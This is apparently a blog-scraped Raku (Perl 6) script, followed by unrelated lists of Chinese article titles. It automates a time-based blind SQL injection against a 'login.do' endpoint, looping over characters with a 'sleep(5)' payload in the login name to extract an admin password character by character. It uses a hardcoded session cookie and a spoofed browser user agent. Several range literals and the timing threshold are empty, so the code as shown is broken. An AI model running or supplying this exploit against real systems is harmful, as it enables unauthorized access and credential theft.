use HTTP::UserAgent;

my $ua = HTTP::UserAgent.new;

my $r = HTTP::Request.new;

my $c = HTTP::Cookies.new;

$c.set-cookie('Set-Cookie:JSESSIONID=06617AD9F324C7D49D3218D800B8FBB6');

my $url = 'http://target/login.do';

$r.uri: $url;

$r.set-method: 'POST';

$r.add-cookies($c);

$r.header.field(:user-agent<Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/ Firefox/52.0>);

my %data = :loginName<inject>,:password<admin>,:vcode<vzhc>;

my @a = ..;

my @swap = 'a'..'z';

@a.append(@swap);

my @password;

for .. {

  for @a -> $char {

    %data<loginName>="admin' and (\'$char\'!=substr(password,$_,1) or 1=sleep(5)) and ''='";

    $r.add-form-data(%data);

    my $stime = time;

    my $result = $ua.request($r);

    my $endtime = time;

    my $finish_time = $endtime-$stime;

    if ($finish_time >= ) {

      say $char;

      @password.append($char);

      say 'password-> '~@password.join('');

      last;

    }

  }

}

say @password.join('');

最新文章

  1. 初识Jsp,JavaBean,Servlet以及一个简单mvc模式的登录界面
  2. IOS网络第二天 - 04-黑酷-GDataXML 解析
  3. Android Studio-导入External Libraries
  4. Android OkHttp详解
  5. MVC LINQ中用封装的TSQL通用更新方法
  6. Hibernate五 HQL查询
  7. jQuery之异步Ajax请求使用
  8. linux终奌站 信息 格式 更改 /etc/bashrc
  9. Python2与Python3字符编码的区别
  10. Configuring SSL for SAP Host Agent on UNIX
  11. html常用标签学习笔记
  12. BZOJ1889 : Maximal
  13. 版本控制工具Git的复杂用法的情境分析
  14. Add和AddRange的使用
  15. SQL数据查询之——嵌套查询
  16. mathematica里面清除全部变量
  17. 将javaweb项目部署到阿里云服务器
  18. 详解UML图之类图
  19. cpu几种架构区别
  20. unity 渲染第一步

热门文章

  1. app耗电量测试工具--PowerTutor
  2. SSH管理(重启 停止 运行 安装)centos7
  3. FZU2125_简单的等式
  4. Django基于正则表达式的URL(1)
  5. CAS单点登录详细流程
  6. [HNOI2006]最短母串问题——AC自动机+状压+bfs环形处理
  7. python 常用 time, datetime处理
  8. Qt ------ 判断运行在何种系统下
  9. Redis 为什么用跳表而不用平衡树
  10. python shell